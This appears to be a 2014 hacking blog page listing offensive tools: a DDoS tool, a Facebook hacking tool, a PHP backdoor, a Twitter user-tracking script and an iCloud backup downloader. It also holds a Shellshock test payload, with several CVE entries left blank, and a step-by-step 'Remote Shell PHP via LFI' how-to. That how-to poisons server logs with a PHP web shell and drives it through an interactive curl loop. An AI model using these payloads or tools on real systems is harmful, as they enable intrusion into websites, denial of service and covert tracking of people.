CVE Feeds

Sep 30, 2014

Shellshock Test List

CVE-2014-6271

+env X='() { :; }; echo "CVE-2014-6271 vulnerable"' bash -c id


CVE-2014-7169

will create a file named echo in cwd with date in it, if vulnerable

CVE-2014-7186

CVE-2014-7187

 

CVE-2014-6277


Source:
https://github.com/mubix/shellshocker-pocs 
https://github.com/hannob/bashcheck



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Videos: Black Hat USA 2014

https://www.youtube.com/playlist?list=UUbbgnifxfH-nqx6z9XQ963Q

 

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Sep 23, 2014

Tools: DAWIN - Distributed Audit & Wireless Intrusion Notification


DA- WIN (pronounced DARWIN) is the evolution of wireless security scanning. Developed by a team that had a significant impact on the field of 802.11 security, it embraces the true-ism that most organisations don't like or embrace network IDS technology and so are unlikely to welcome, invest in or support an IDS implementation in a more specialised area like Wfi.
Scanning is a costly, regulatory requirement for many - Yet it often provides little security protection because it only measures the threat on 4 or 5 days a year. How many CIOs would be happy with a firewall or anti-virus that worked for 1 week in 52?  



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: UFONet - DDoS Tool

UFONet - is a tool designed to launch DDoS attacks against a target, 
using 'Open Redirect' vectors on third party web applications, like botnet.


Source:: http://ufonet.sourceforge.net/

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: Facebook Hacking Tool

Facebook Hacking Tool
Python - -version 2.7.3 (Windows/Linux)
IMPORTS:
Matplotlib-1.2.1 Networkx-1.8.1 Numpy-1.7.1 Pygraphviz-1.1 Simplejson-3.3.0 Mechanize-0.2.5 Other: gephi-0.8.2-beta (Graphs software)
Recomendation: Use setuptools for the dependencies
S.O: Working on Windows 7 64/32 bits Working on Kali Linux (Yeah, sucks) but probably works on the others (deprecated - read below)
Usage: python main.py 


Source: https://github.com/chinoogawa/fbht


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Sep 22, 2014

Howto: Remote Shell PHP via LFI

1. Find the LFI vulnerability in website

2. Inject web shell into log file with useragent or x-forwarded-for header or something that logger will log it.
# curl -s -A '<?php system($_GET['cmd']); ?>' 'http://target.com/' -o /dev/null
 
3.  When you can inject web shell, try use the shell with any command such as id, pwd, ls
# curl -s 'http://target.com/include.php?page=../../../../../../var/log/access.log&cmd=id'

4. Now you're ready to get the remote shell is similar that you are directly interactive in target.com's shell.(Run this in our shell)
# while true; do read -p 'cmd>' cmd; cmd=$(php -r "echo urlencode('$cmd');"); curl -s "http://target.com/include.php?page=../../../../../../var/log/access.log&cmd=$cmd" ; done

5. Now you will browse to "http://target.com/include.php?page=../../../../../../var/log/access.log&cmd=" and send command continuously similar you are in the target.com



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Sep 20, 2014

Tools: WebPwn3r - Web Applications Security Scanner.

In it’s Current Public [Demo] version, WebPwn3r got below Features:
1- Scan a URL or List of URL’s
2- Detect and Exploit Remote Code Injection Vulnerabilities.
3- ~ ~ ~ Remote Command Execution Vulnerabilities.
4- ~ ~ ~ SQL Injection Vulnerabilities.
5- ~ ~ ~ Typical XSS Vulnerabilities.
6- Detect WebKnight WAF.
7- Improved Payloads to bypass Security Filters/WAF’s.
8- Finger-Print the backend Technologies.

Source: https://github.com/zigoo0/webpwn3r


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Sep 18, 2014

Tools: PoisonShell PHP Backdoor

PoisonShell is a simple PHP shell that has several options

Source: http://packetstormsecurity.com/files/128249/poison.zip

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: tinfoleak – Get detailed information about a Twitter user activity



tinfoleak is a simple Python script that allow to obtain:
  • basic information about a Twitter user (name, picture, location, followers, etc.)
  • devices and operating systems used by the Twitter user
  • applications and social networks used by the Twitter user
  • place and geolocation coordinates to generate a tracking map of locations visited
  • show user tweets in Google Earth!
  • download all pics from a Twitter user
  • hashtags used by the Twitter user and when are used (date and time)
  • user mentions by the the Twitter user and when are occurred (date and time)
  • topics used by the Twitter user
You can filter all the information by:
  • start date / time
  • end date / time
  • keywords


Source: http://vicenteaguileradiaz.com/tools/

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Sep 16, 2014

Tools: iLoot - Download backup of device from iCloud


Using this CLI tool you can download backups of devices assigned to your AppleID. Based on iphone-dataprotection script, so copyrights belong to respective owners. Offset operations added and other minor bugs fixed.

Source: https://github.com/hackappcom/iloot

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.
 

Sponsors

lusovps.com

Blogroll

About

 Please subscribe my blog.

 Old Subscribe

Share |